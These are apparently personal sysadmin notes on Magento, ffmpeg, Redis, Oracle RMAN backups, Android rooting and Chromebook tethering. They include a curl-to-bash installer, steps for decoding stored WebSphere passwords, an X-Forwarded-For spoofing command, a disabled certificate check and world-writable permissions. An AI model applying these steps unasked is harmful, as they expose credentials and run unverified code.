    iptables -A RH-Firewall-1-INPUT -j REJECT --reject-with icmp-host-prohibited

    /*modprobe ip_conntrack_ftp
    iptables -I INPUT -p tcp -m tcp --dport 21 -m conntrack --ctstate ESTABLISHED -j ACCEPT -m comment --comment "Allow ftp connections on port 21"
    iptables -I OUTPUT -p tcp -m tcp --dport 21 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT -m comment --comment "Allow ftp connections on port 21"

    iptables -I INPUT -p tcp -m tcp --dport 20 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT -m comment --comment "Allow ftp connections on port 20"
    iptables -I OUTPUT -p tcp -m tcp --dport 20 -m conntrack --ctstate ESTABLISHED -j ACCEPT -m comment --comment "Allow ftp connections on port 20"
    */

    iptables -I INPUT -m state --state NEW,ESTABLISHED -m tcp -p tcp --dport 80 -j ACCEPT
    iptables -I INPUT -m state --state NEW,ESTABLISHED -m tcp -p tcp --dport 20022:20023 -j ACCEPT

    service iptables save
  • Settings

    1
    2
    3
    chown -R 777 magento/media
    php_value memory_limit 512M in .htaccess
    upload_max_filesize = 100M /etc/php.ini
  • Fix problem (PHP Fatal error: Unknown: Failed opening required ‘/var/www/html/magento/index.php’ (include_path=’.:/usr/share/pear:/usr/share/php’) in Unknown on line 0)
    sudo /sbin/restorecon -R /var/www/html/magento/

  • Install git

    1
    2
    3
    4
    5
    yum -y install zlib-devel openssl-devel cpio expat-devel gettext-devel gcc
    wget https://www.kernel.org/pub/software/scm/git/git-1.8.5.4.tar.gz
    make configure
    ./configure --with-expat --with-openssl --with-curl
    make && make install
  • Upgrade mysql

    1
    2
    3
    4
    5
    6
    7
    8
    9
    yum remove mysql-*
    yum remove libmysqlclient15-5.0.95-5.w5.x86_64

    download mysql-community-release-el5-{version-number}.noarch.rpm from http://dev.mysql.com/doc/mysql-repo-excerpt/5.6/en/linux-installation-yum-repo.html
    rpm -Uvh mysql-community-release-el5-5.noarch.rpm
    yum install mysql-community-server
    yum install -y dovecot
    yum install -y perl-DBD-MySQL
    yum install -y php54w-mysql
  • Remove index.php in url
    in /etc/conf/httpd.conf, in section <Directory "/var/www/html">, change AllowOverride None to AllowOverride All
    edit magento/.htaccess and uncomment the line: RewriteBase /magento/
    in admin console,
    In System->Configuration->Web->Search Engines Optimizations, select Yes
    In System->Configuration->Web->Secure->Use Secure Urls in the fontend, select Yes

  • Admin console settings
    System->Configuration->System->Advanced->Advanced->Disable Modules Output
    System->Configuration->System->Advanced->Developer->Log Settings
    set Mage::setIsDeveloperMode(true); and ini_set(‘display_errors’, 1); in file index.php
    System->Cache Management
    System->Index Management

  • Access control to catogeroy
    System->Category->Customer Groups Access Control http://www.zetaprints.com/magentohelp/magento-access-control-for-dynamic-imaging/

  • Install extenstion
    System->Magento Connect

  • Install phpMyAdmin
    cd /var/www/html && mv phpMyAdmin pma

  • Product video link
    http://de.magentocommerce.com/magento-connect/product-videos-2.html
    http://www.magentocommerce.com/magento-connect/product-video-1.html
    http://www.magentocommerce.com/magento-connect/product-video-4.html
    Installed http://www.magentocommerce.com/magento-connect/youtube-video-gallery-1.html

  • Disable Mage_Notification module to off the noti of callout

  • Set logo
    System->Configuration->General->design->Logo Image Src

  • Change color
    Install ruby and rubygems and compass

    1
    2
    3
    4
    5
    6
    curl -sSL https://get.rvm.io | bash
    srouce /etc/profile.d/rvm.sh
    rvm install 1.9.3
    rvm use 1.9.3 --default
    gem install compass
    Change color => compass watch . && edit skin/frontend/rwd/default/scss/_var.scss
  • Log all sql
    Edit lib/Varien/Db/Adapter/Pdo/Mysql.php, on these $_debug $_logAllQueries, refer to how-to-log-all-magento-sql

  • Install Redis

    1
    2
    3
    4
    5
    6
    7
    wget https://github.com/antirez/redis/archive/2.8.21.tar.gz
    tar zxf redis-2.8.21.tar.gz
    make && sudo make install
    cd utils
    ./install_server.sh # the last answer is "/usr/local/bin/redis-server"
    sudo chkconfig redis_6379 on
    sudo service redis_6379 start
  • Install phpRedisAdmin

    1
    2
    3
    git clone git://github.com/ErikDubbelboer/phpRedisAdmin.git
    cd phpRedisAdmin
    git clone https://github.com/nrk/predis.git vendor
  • Install Cm_RedisSession
    enable Cm_RedisSession module
    /app/etc/modules/Cm_RedisSession.xml active -> true
    rm -rf var/cache
    System > Cache Management, Flush Magento Cache
    update app/etc/local.xml

  • Install Cm_Cache_Backend_Redis && phpredis && modman

    • phpredis
      1
      2
      3
      4
      git clone https://github.com/phpredis/phpredis
      phpize
      ./configure [--enable-redis-igbinary]
      make && make install
      add extension=redis.so in /etc/php.d/redis.ini
      add config of redis cache in app/etc/local.xml
    • Install modman from https://github.com/colinmollenhour/modman
1
2
modman init
modman clone https://github.com/colinmollenhour/Cm_Cache_Backend_Redis

lib Credis && Cm_Cache_Backend_Redis are already installed, just copy these files to respective directory
run php stats.php to show the usage of tags in redis

  • Install tmux

    • yum install glibc-static
    • install ncurse : ./configure && make && sudo make install
    • install tmux :
      1
      ./configure --enable-static CFLAGS="-I/usr/local/include -I/usr/local/include/ncurses" LDFLAGS="-L/usr/local/lib -L/usr/local/include -L/usr/local/include/ncurses" LIBEVENT_CFLAGS="-I/usr/local/include" LIBEVENT_LIBS="-L/usr/local/lib -levent"
    • Reference: http://pyther.net/2014/03/building-tmux-1-9a-statically/
  • Install ranger

Install transmission-daemon on CentOS

Fail to install rTorrent on CentOS 5.4, just install transmission-daemon

  • libevent

    1
    2
    3
    4
    wget --no-check-certificate https://sourceforge.net/projects/levent/files/libevent/libevent-2.0/libevent-2.0.22-stable.tar.gz
    tar xzf libevent-2.0.22-stable.tar.gz
    cd libevent-2.0.22-stable
    make && sudo make install
  • curl

    1
    2
    3
    4
    wget http://curl.haxx.se/download/curl-7.44.0.tar.gz
    tar zxf curl-7.44.0.tar.gz
    cd curl-7.44.0
    make && sudo make install
  • transmission

    1
    2
    3
    4
    5
    6
    7
    8
    9
    wget http://download.transmissionbt.com/files/transmission-2.84.tar.xz
    yum install -y xz
    unxz transmission-2.84.tar.xz
    cd transmission-2.84
    export PKG_CONFIG_PATH=/usr/local/lib/pkgconfig
    export LIBS="-pthread -lm -lz -ldl -lutil"
    export LIBCURL_LIBS="-I/usr/local/lib -lcurl"
    export LIBEVENT_LIBS="-I/usr/local/lib -levent"
    make && sudo make install

check config at $HOME/.config/transmission-daemon

1
2
3
transmission-remote --add xxx.torrent # add seed
transmission-remote -st # check status
transmission-remote -l # list

Install ffmpeg on CentOS (RHEL/Fedora)

1
2
mkdir ffmpeg_sources
cd ffmpeg_sources/
  • yasm

    1
    2
    3
    4
    5
    6
    wget http://www.tortall.net/projects/yasm/releases/yasm-1.2.0.tar.gz
    tar zxvf yasm-1.2.0.tar.gz
    # ./configure
    ./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build
    #make && sudo make install
    make && make install
  • x264

    1
    2
    3
    4
    5
    6
    7
    8
    9
    sudo echo "/opt/software/ffmpeg_sources/ffmpeg_build/lib" > /etc/ld.so.conf.d/ffmpeg.conf
    sudo ldconfig
    export PATH=$PATH:/opt/software/ffmpeg_sources/ffmpeg_build/bin

    #git clone git://git.videolan.org/x264.git (old)
    git clone https://git.videolan.org/git/x264.git
    cd x264
    ./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build --enable-static
    make && make install
  • lame

    1
    2
    3
    4
    curl -L -O http://downloads.sourceforge.net/project/lame/lame/3.99/lame-3.99.5.tar.gz
    tar zxf lame-3.99.5.tar.gz
    ./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build --enable-nasm
    make && sudo make install
  • ogg

    1
    2
    3
    4
    5
    wget http://downloads.xiph.org/releases/ogg/libogg-1.3.0.tar.gz
    tar zxvf libogg-1.3.0.tar.gz
    cd libogg-1.3.0
    ./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build
    make && make install
  • libvorbis

    1
    2
    3
    4
    5
    curl -O http://downloads.xiph.org/releases/vorbis/libvorbis-1.3.4.tar.gz
    tar zxvf libvorbis-1.3.4.tar.gz
    export PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/opt/software/ffmpeg_sources/ffmpeg_build/lib/pkgconfig
    ./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build --with-ogg
    make && make install
  • libvpx

    1
    2
    3
    4
    5
    6
    7
    git clone https://github.com/webmproject/libvpx.git #(need to set core.gitProxy)
    cd libvpx/
    ./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build
    make && sudo make install

    #sudo echo /usr/local/lib > /etc/ld.so.conf.d/local-libs.conf
    sudo ldconfig
  • xvidcore

    1
    2
    3
    4
    5
    wget http://downloads.xvid.org/downloads/xvidcore-1.3.2.tar.gz
    tar zxf xvidcore-1.3.2.tar.gz
    cd xvidcore/build/generic
    ./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build
    make && make install
  • ffmpeg

    1
    2
    3
    4
    5
    6
    7
    #git clone git://git.videolan.org/ffmpeg.git (old)
    git clone https://git.videolan.org/git/ffmpeg.git
    cd ffmpeg
    ./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build --enable-libmp3lame --enable-gpl --enable-libx264 --enable-libxvid --enable-postproc --enable-nonfree --enable-libvpx --enable-libvorbis --extra-cflags=-I/opt/software/ffmpeg_sources/ffmpeg_build/include --extra-ldflags=-L/opt/software/ffmpeg_sources/ffmpeg_build/lib ## no faac --enable-libfaac
    make && make install

    ffmpeg -headers "X-Forwarded-For: 160.53.186.194" -i http://stmw.rthk.hk/aod/_definst_/radio/archive/radio1/City_Snapshot/mp3/mp3:20150824.mp3/playlist.m3u8 -c copy City_Snapshot-20150824-.mp3

    the option “headers” must be put here for download this m3u8

  • Reference
    https://trac.ffmpeg.org/wiki/CompilationGuide/Centos
    http://injustfiveminutes.com/2013/07/17/how-to-compile-latest-version-of-ffmpeg-on-centos-5/

Auto login in koding.com using selenium

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
package xx;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.List;

import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.remote.DesiredCapabilities;
import org.openqa.selenium.remote.RemoteWebDriver;
import org.openqa.selenium.support.ui.WebDriverWait;

import com.google.common.base.Function;

public class Selenium2Example {
public static void main(String[] args) throws MalformedURLException {
// Create a new instance of the Chrome driver
// Notice that the remainder of the code relies on the interface,
// not the implementation.
System.setProperty("webdriver.chrome.driver",
"C:\\Users\\User\\#Downloads\\chromedriver_win32\\chromedriver.exe");
ChromeDriver driver = new ChromeDriver();

//WebDriver driver = new RemoteWebDriver(new URL("http://127.0.0.1:9515"), DesiredCapabilities.chrome());

// And now use this to visit Google
driver.get("https://koding.com/Login");
// Alternatively the same thing can be done like this
// driver.navigate().to("http://www.google.com");

// Find the text input element by its name
WebElement element = driver.findElement(By.name("username"));

// Enter something to search for
CharSequence[] ch = new CharSequence[] { "xxx" };
element.sendKeys(ch);

WebElement element2 = driver.findElement(By.name("password"));
element2.sendKeys(new CharSequence[] { "vvv" });

// Now submit the form. WebDriver will find the form for us from the element
element.submit();

// Check the title of the page
System.out.println("Page title is: " + driver.getTitle());

try {
WebElement button = (new WebDriverWait(driver, 20)).until(new Function<WebDriver, WebElement>() {
public WebElement apply(WebDriver driver) {
List<WebElement> els = driver.findElements(By.id("kd-376"));
if (!els.isEmpty()) {
return els.get(0);
}
return null;
}
});

if (button != null) {
button.click();
new WebDriverWait(driver, 10);
}
} catch (Exception e) {
e.printStackTrace();
}

System.out.println("Page title is: " + driver.getTitle());

//Close the browser
driver.quit();
}
}

Root lenovo A916 and Sony Xperia T2 Ultra

Root lenovo A916 and Sony Xperia T2 Ultra.
Download adb and fastboot1.

  • In windows, download Android ADB Fastboot 1.3.msi
  • In Ubuntu, apt-get install android-tools-adb android-tools-fastboot unlock bootloader, flash cwm-recovery and root phone
    1
    2
    3
    4
    5
    6
    7
    8
    adb reboot-bootloader
    fastboot devices
    fastboot oem unlock
    fastboot reboot
    fastboot flash recovery cwm-recovery.img
    fastboot reboot
    adb push UPDATE-SuperSU-v2.46.zip /sdcard/
    Install SuperSU zip according by ClockworkMod menu

Extra: check information

  • A916 -> adb reboot recovery -> check internel version, found version: A916_S205_141013, call *#*#5448264#*#* to enable dual sim dual standby
  • D5303 -> call *#*#7378423#*#* to check service information

Reference:
Dual Sim card dual standby http://ask.lenovomobile.com/index.php?question/view/598417.html
https://forums.lenovo.com/t5/A-and-P-Series/Lenovo-phone-a916-A916-S1205-141013/td-p/2049911
http://pdadb.net/index.php?m=specs&id=6663&c=lenovo_a916_dual_sim_td-lte

Download A916 offical ROM and CWM Recovery http://ask.lenovomobile.com/?q-594219.html

Dual SIM Dual Standby Official ROM http://blog.cellphonemic.com/?p=624
Recovery http://blog.cellphonemic.com/?p=694
One Key Root http://blog.cellphonemic.com/?p=627

unlock bootloader of T2 Ultra http://developer.sonymobile.com/unlockbootloader/

HTC/华为/酷派手机官方解锁教程 http://bbs.360safe.com/thread-4954939-1-1.html

All in this post (VERY USEFUL) [GUIDE] OnePlus One - How to Unlock Bootloader, Install Custom Recovery and Root

【攻略】Android 進階開發教學:讓你一次補足所有知識!

lifehacker
The Most Useful Things You Can Do with ADB and Fastboot on Android
How to Flash a ROM to Your Android Phone

WIKI Of CM and CWM recovery http://wiki.cyanogenmod.org/w/Doc:_fastboot_intro
(fix the issue of “wait for the device”)
http://wiki.cyanogenmod.org/w/All_About_Recovery_Images
http://wiki.cyanogenmod.org/w/ClockWorkMod_Instructions

Unlock bootloader and install recovery
How to root Lenovo A916 phablet in less than an hour
Download CWM & TWRP Recovery for Lenovo A916
用臨時Recovery root機
[HowTo] Unlocking the Bootloader (Windows)

Reference:
木子软件 http://www.muzisoft.com/recovery/ http://www.muzisoft.com/root/
刷机网 http://www.shuaji.net/
线刷宝 - 华为fastboot机型解锁教程 http://www.xianshuabao.com/skill/285.html

Root Sony WT19i
http://forum.xda-developers.com/showthread.php?t=1559685
http://forum.xda-developers.com/showthread.php?t=1865037
http://www.android.gs/root-sony-xperia-live-walkman-wt19i/

Backup / Restore Oracle DB

  • Backup Oracle DB in NOARCHIVELOG mode.In sqlplus console,
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    $ sqlplus / as sysdba (sqlplus /nolog then conn /as sysdba)
    SQL> archive log list;
    SQL> show parameter DB_RECOVERY_FILE_DEST;
    SQL> alter system set db_recovery_file_dest='/flash_recovery_area' scope=both;
    SQL> shutdown immediate;
    SQL> startup mount;
    // at this time, run RMAN> backup database;
    // OR change archive log mode
    SQL> alter database archivelog;
    SQL> alter database open;
    SQL> archive log list;
    SQL> alter system switch logfile; ( OR alter system archive log current)
    SQL> select operation, status, mbytes_processed, start_time, end_time from v$rman_status order by start_time;

If archivelog mode is enabled

1
2
3
4
5
6
7
RMAN> backup incremental level 0 database plus archivelog delete input;
OR
RMAN> backup as compressed backupset incremental level 0 database include current controlfile plus archivelog;
OR
RMAN> backup as compressed backupset incremental level 0 database include current controlfile plus archivelog delete all input;
ADN
RMAN> backup incremental level 1 database plus archivelog delete input;

In rman prompt,

1
2
3
4
5
6
7
8
9
10
11
12
13
$ rman
RMAN> connect target /;
RMAN> list backup;
RMAN> list backup summary;
RMAN> backup as compressed backupset tag 'weeekly_prd01_tbls_bk_only' tablespace prd01;
RMAN> backup as compressed backupset database plus archivelog ;

RMAN> run { # backup directly in noarchive mode
shutdown immediate;
startup mount;
backup database;
alter database open;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
RMAN> show all;
CONFIGURE RETENTION POLICY TO REDUNDANCY 1;
CONFIGURE BACKUP OPTIMIZATION ON;
CONFIGURE DEFAULT DEVICE TYPE TO DISK;
CONFIGURE CONTROLFILE AUTOBACKUP ON;
CONFIGURE CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK TO '/tmp/backup/%F';
CONFIGURE DEVICE TYPE DISK PARALLELISM 1 BACKUP TYPE TO BACKUPSET;
CONFIGURE DATAFILE BACKUP COPIES FOR DEVICE TYPE DISK TO 1;
CONFIGURE ARCHIVELOG BACKUP COPIES FOR DEVICE TYPE DISK TO 1;
CONFIGURE CHANNEL DEVICE TYPE DISK FORMAT '/tmp/backup/dbkup_%Y%M%D_%U';
CONFIGURE MAXSETSIZE TO UNLIMITED;
CONFIGURE ENCRYPTION FOR DATABASE OFF;
CONFIGURE ENCRYPTION ALGORITHM 'AES128';
CONFIGURE COMPRESSION ALGORITHM 'BASIC' AS OF RELEASE 'DEFAULT' OPTIMIZE FOR LOAD TRUE;
CONFIGURE ARCHIVELOG DELETION POLICY TO NONE;
CONFIGURE SNAPSHOT CONTROLFILE NAME TO '/u01/app/oracle/product/11.2.0/dbhome_1/dbs/snapcf_CHHDEV2.f';

Full version of backup

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
#!/usr/bin/ksh

DATABASE=CHHDEV2

RUNTIME=`date '+%H%M_%d%m%Y'`

BACKUPDIR=/tmp/backup

LOGFILE=${BACKUPDIR}/${ORACLE_SID}_${RUNTIME}.log

LEVEL=0

exec >> ${LOGFILE} 2>&1

$ORACLE_HOME/bin/rman msgno target / nocatalog <<EOF!

CONFIGURE RETENTION POLICY TO REDUNDANCY 3; # default 1

# CONFIGURE RETENTION POLICY TO RECOVERY WINDOW OF 14 DAYS; # default 1

CONFIGURE BACKUP OPTIMIZATION ON; # default OFF

CONFIGURE DEFAULT DEVICE TYPE TO DISK; # default

CONFIGURE CONTROLFILE AUTOBACKUP ON; # default OFF

CONFIGURE CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK TO '${BACKUPDIR}/ora_cf%F'; # default '%F'

CONFIGURE DEVICE TYPE DISK PARALLELISM 3; # default 1

CONFIGURE DATAFILE BACKUP COPIES FOR DEVICE TYPE DISK TO 1; # default

CONFIGURE ARCHIVELOG BACKUP COPIES FOR DEVICE TYPE DISK TO 1; # default

CONFIGURE CHANNEL DEVICE TYPE DISK FORMAT '${BACKUPDIR}/ora_df%t_s%s_s%p';

CONFIGURE MAXSETSIZE TO UNLIMITED; # default

CONFIGURE SNAPSHOT CONTROLFILE NAME TO '${BACKUPDIR}/snapcf_${DATABASE}.f';

SHOW ALL;

sql "alter system switch logfile";

CROSSCHECK ARCHIVELOG ALL;

# BACKUP AS COMPRESSED BACKUPSET INCREMENTAL LEVEL 0 DATABASE INCLUDE CURRENT CONTROLFILE PLUS ARCHIVELOG DELETE ALL INPUT;

# BACKUP AS COMPRESSED BACKUPSET DATABASE INCLUDE CURRENT CONTROLFILE PLUS ARCHIVELOG DELETE ALL INPUT;

# BACKUP DATABASE INCLUDE CURRENT CONTROLFILE PLUS ARCHIVELOG DELETE ALL INPUT;

# backup AS COMPRESSED BACKUPSET database include current controlfile format '${BACKUPDIR}/ora_df%t_s%s_s%p';

# backup AS COMPRESSED BACKUPSET archivelog UNTIL TIME '(SYSDATE - 1)' not backed up 1 times format '${BACKUPDIR}/ora_arc%t_s%s_s%p';

# delete noprompt archivelog until time '(SYSDATE -1)' backed up 1 times to device type disk;

BACKUP AS COMPRESSED BACKUPSET INCREMENTAL LEVEL ${LEVEL} DATABASE INCLUDE CURRENT CONTROLFILE PLUS ARCHIVELOG;

DELETE NOPROMPT COPY OF ARCHIVELOG ALL COMPLETED BEFORE 'SYSDATE-5';

sql "alter database backup controlfile to trace as ''${BACKUPDIR}/ctrlfile_${DATABASE}_${RUNTIME}''";

allocate channel for maintenance type disk;

delete noprompt obsolete device type disk;

CROSSCHECK BACKUP;

CROSSCHECK ARCHIVELOG ALL;

REPORT OBSOLETE;

DELETE FORCE NOPROMPT OBSOLETE;

DELETE FORCE NOPROMPT expired backup of archivelog all;

DELETE FORCE NOPROMPT expired backup;

LIST BACKUP OF DATABASE;

LIST BACKUP OF ARCHIVELOG ALL;

LIST BACKUP;

release channel;

EXIT

EOF!

exit

  • Store Oracle DB
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    RMAN> SET DBID 70161972;
    RMAN> RUN {
    startup force nomount;
    SET CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK TO '/tmp/backup/%F';
    RESTORE CONTROLFILE to '/tmp/controlfile' FROM AUTOBACKUP;
    RESTORE SPFILE to pfile '/tmp/pfile' FROM AUTOBACKUP;
    //OR
    restore controlfile from autobackup;
    restore spfile from autobackup;

    SET ARCHIVELOG DESTINATION TO '/tmp/temp_restore';
    RESTORE ARCHIVELOG ALL;

    startup mount;
    restore database;
    recover database;
    sql 'alter database open RESETLOGS';
    }

Reference:
https://support.software.dell.com/netvault-backup/kb/140173
http://dbaworkshop.blogspot.hk/2012/07/how-to-backup-database-in-noarchivelog_31.html
http://ss64.com/ora/rman_backup.html
http://www.dba-oracle.com/t_rman_incremental_backups.htm
http://www.dba-oracle.com/concepts/rman_recovery_database_spfile.htm
http://www.dba-oracle.com/concepts/rman.htm
http://www.dba-oracle.com/concepts/rman_online_offline_backups.htm
http://www.dba-village.com/village/dvp_forum.OpenThread?ThreadIdA=44077&DestinationA=RSS
http://docs.oracle.com/cd/E11882_01/backup.112/e10642/rcmadvre.htm
http://docs.oracle.com/cd/B19306_01/backup.102/b14192/recov004.htm#i1032364

Decode/Encode websphere database password

  • Locate the file at /usr/IBM/WebSphere/AppServer/profiles/AppSrvMars01/config/cells/mars01Cell01/security.xml

  • Find the “authDataEntries” tag and then get the password attribute.

  • Open console and goto directory /usr/IBM/WebSphere/AppServer,
    encode:

    1
    java -cp plugins/com.ibm.ws.runtime.jar:lib/bootstrap.jar:runtimes/com.ibm.jaxws.thinclient_7.0.0.jar com.ibm.ws.security.util.PasswordEncoder password

    decode:

    1
    java -cp plugins/com.ibm.ws.runtime.jar:lib/bootstrap.jar:runtimes/com.ibm.jaxws.thinclient_7.0.0.jar com.ibm.ws.security.util.PasswordDecoder {xor}Lz4sLCgwLTs=

Reference:
http://www.sysman.nl/wasdecoder/
http://stackoverflow.com/questions/7885134/how-to-recover-admin-password-in-websphere-portal-v7
http://weblogic-wonders.com/weblogic/tag/com-ibm-ws-bootstrap-raswsloggerfactory/

Decrypt file with GPG and Download m3u8 file

Decrypt file with GPG

  • Import keys to gpg
    1
    2
    3
    gpgimport secring.skr
    gpgimport pubring.pkr
    gpg –list-keys
    result as below,
    1
    2
    3
    4
    5
    6
    pub 2048R/82F66E2C 2014-01-06 [expires: 2017-01-06]
    Key fingerprint = 4BA1 30AA 793A 1D54 2787 F287 F87E 5CFF 82F6 6E2C
    uid xxxx-999999999-20140106 sub 2048R/A1EBDC74 2014-01-06 [expires: 2017-01-06]
    pub 4096R/A05189D6 2014-01-02 [expires: 2017-12-31]
    Key fingerprint = 674A 9A1D 5675 ED25 802C 574C F591 50E3 A051 89D6
    uid CEMailBxHKEPSC2017-12-31 sub 4096R/B47C7A5B 2014-01-02 [expires: 2017-12-31]
  • Run sftp -P 38024 ephp2650@203.112.90.74 to login
  • Download PPSCDDMMYY.pgp from server
  • Run gpg PPSCDDMMYY.pgp to decrypt and mv PPSCDDMMYY PPSCDDMMYY.zip and unzip PPSCDDMMYY.zip to get file MERCHANT.TXT

Download m3u8 file

  • Install Chrome Cache View from NirSoft
  • Install ffmpeg
    1
    2
    3
    sudo add-apt-repository ppa:mc3man/trusty-media
    sudo apt-get update
    sudo apt-get install ffmpeg gstreamer0.10-ffmpeg
  • find m3u8 url in Chrome Cache View
  • run
    ffmpeg -i http://stmw.rthk.hk/aod/_definst_/radio/archive/radio1/City_Snapshot/mp3/mp3:20150413.mp3/playlist.m3u8 -c copy City_Snapshot-20150413-.mp3 to download

Reference:

GnuPG

http://www.pgpi.org/doc/pgpintro/
http://www.hanewin.net/encrypt/PGcrypt.htm
http://support.gpgtools.org/kb/gpgservices-faq/how-to-encrypt-and-sign-text-or-files-with-gpgservices
http://science.opposingviews.com/decrypt-file-using-pgp-23391.html
ftp://ftp.pgpi.org/pub/pgp/6.5/docs/english/PGPCmdLineGuide.pdf
http://askubuntu.com/questions/100281/how-do-i-make-a-pgp-key
https://help.ubuntu.com/community/GnuPrivacyGuardHowto
http://www.techrepublic.com/blog/linux-and-open-source/encrypting-and-decrypting-files-with-gnupg/
http://ubuntuforums.org/showthread.php?t=680292
http://askubuntu.com/questions/332020/how-do-i-import-a-private-key-into-gpg-so-that-it-becomes-the-default-key
https://www.madboa.com/geek/gpg-quickstart/
http://www.spywarewarrior.com/uiuc/gpg/gpg-com-4.htm

Download m3u8

http://swimminginthought.com/download-m3u8-file/

Things on Chromebook

I am pleased for the performance and design with my chromebook Acer C720.
I had installed crouton by following the procedure,

  • Enable develop mode -> esc + refresh + power button, then crtl + d.
  • Open crosh window by crtl + alt + t, type shell, run sudo sh -e ./crouton -t xfce the default system installed in your chroot will be ubuntu 12.04 precise. To see the usage of crouton, sh ./crouton -h or sh ./crouton -t list or sh ./crouton -r list
  • Do not use the argument -P which install crouton via proxy, since opengpg verification would be failed by proxy, then process will pause.
  • To enter into ubuntu, just type sudo enter-chroot or sudo startxfce4, switch system by crtl + alt + forward then refresh and crtl + alt + backward
  • Recommend to install crouton integration extension in chrome from web store in google
  • Update ubuntu, sudo sh ./crouton -u -t xiwi,extension,keyboard, target xiwi should be placed at first, then sudo startxfce4 -b, ubuntu will run in a chrome tab, that is amazing. An issue encounterred when install xiwi is missing the dependency xserver-xorg-core, sudo enter-chroot then sudo apt-get install xserver-xorg-core
  • Some things to do after installing ubuntu, such as sudo apt-get purge xcreensaver, install leafpad, VLC etc.

I would like to leverage usb tethering insteads of wifi tethering from my phone. At beginning, I had tried easytether wihch works perfectly with my dual systems, but the lite version only support http, not include https. I have to find another way to surf internet using usb tethering.

  • To run easytether, install easytether lite from google play, in ubuntu, run sudo apt-get install libusb-1.0.0 and sudo dpkg -i easytether_0.7.4-1_i386.deb, it will install the easytether package in your system, type easytether connect, allow the connection in your phone, a new net interface will appear by ip addr

  • Another way to usb tethering, install adb in ubuntu, socks proxy way to surf intenet. Add ppa repository as below,

    1
    2
    3
    4
    5
    6
    7
    sudo apt-get install software-properties-common
    sudo apt-get install python-software-properties # to add apt-add-repository utility
    sudo add-apt-repository ppa:nilarimogard/webupd8
    sudo apt-get update
    sudo apt-get install android-tools-adb
    sudo apt-get install android-tools-fastboot
    sudo apt-get install usbutils # to add lsusb command
  • Install tools to create a virtual interface to let chromeos can connet to an Ethenent
    sudo apt-get install bridge-utils uml-utilities iptables

  • bridge-utils for brctl

  • uml-utilities for tunctl
    Add following rule in file /etc/udev/rules.d/99-android.rules
    SUBSYSTEM=="usb", ATTR{idVendor}=="0fce", ATTR{idProduct}=="61a9", MODE="0666", GROUP="plugdev"
    sudo service udev restart
    Plug my phone to chromebook, type lsusb, my phone can be recognized as Bus 001 Device 005: ID 0fce:61a9 Sony Ericsson Mobile Communications AB.

  • Follow these steps to connect internet with usb tethering

  • run below script
    adb forward tcp:41927 tcp:41927
    adb forward --list

  • At mobile, run AzLink, at ubuntu run openvpn azilink.ovpn

  • Add bridge interface by

    1
    2
    3
    4
    5
    6
    brctl addbr br0
    ifconfig br0 192.168.56.3 netmask 255.255.255.0 up
    iptables -I FORWARD -i tun0 -o br0 -j ACCEPT
    iptables -I FORWARD -i br0 -o tun0 -j ACCEPT
    iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
    echo “nameserver 8.8.8.8 8.8.4.4” > /etc/resolv.conf
  • At this time, ubuntu can already connect to internet, but chromeos cannot. You need to setup internet connection at Setting Pannel, you just confirm the setting, nothing need to input, then you will see “Conneted to Ethernet”, chromeos now can surf internet.
    If you find the “The Web page is not available” message suddenly, you may re-configure the file /etc/resolv.conf with nameserver 8.8.8.8 8.8.4.4 or nameserver 192.168.56.1

  • Chinese display

  • Check locales /usr/share/i18n/SUPPORTED, /usr/share/locale, /usr/lib/locale

  • Add zh_CN.UTF-8 in /var/lib/locales/supported.d/local

    • re-gen locale : sudo locale-gen sudo dpkg-reconfigure locales
    • Add environment: add zh_CN.UTF-8 in /etc/environment
    • change default language, just export LANG=en_US.UTF-8 or zh_CN.UTF-8
    • Install zh_TW and zh_HK by sudo apt-get install language-support-fonts-zh-hant
    • Install chinese fonts by sudo apt-get install xfonts-wqy
    • Refer to http://www.davidpai.tw/ubuntu/2011/ubuntu-set-locale/
  • Fix issue of no sound in crouton
    Test sound $ sudo enter-chroot aplay /usr/share/sounds/alsa/Front_Center.wav
    Re-install pulseaudio and alsa-base

    1
    2
    3
    sudo apt-get install mplayer smplayer ubuntu-restricted-extras
    sudo apt-get remove --purge pulseaudio alsa-base
    sudo apt-get install pulseaudio alsa-base
  • Install latest version of git and golang

    add-apt-repository ppa:git-core/ppa
    1
    2
    3
    4
    5
    sudo add-apt-repository ppa:bcandrea/backports
    sudo apt-get update
    sudo apt-get install git
    sudo apt-get install golang
    sudo go get github.com/djimenez/iconv-go // Install chinese encoding package
  • Connect to RPi with adafruit serial cable sudo screen /dev/ttyUSB0 115200

  • Install Android Runtime for Chrome and ARC Welder to launch Android app to play with .

  • Tor on ChromeOS

  • Install apps of Orbot and Proxy Server on android mobile

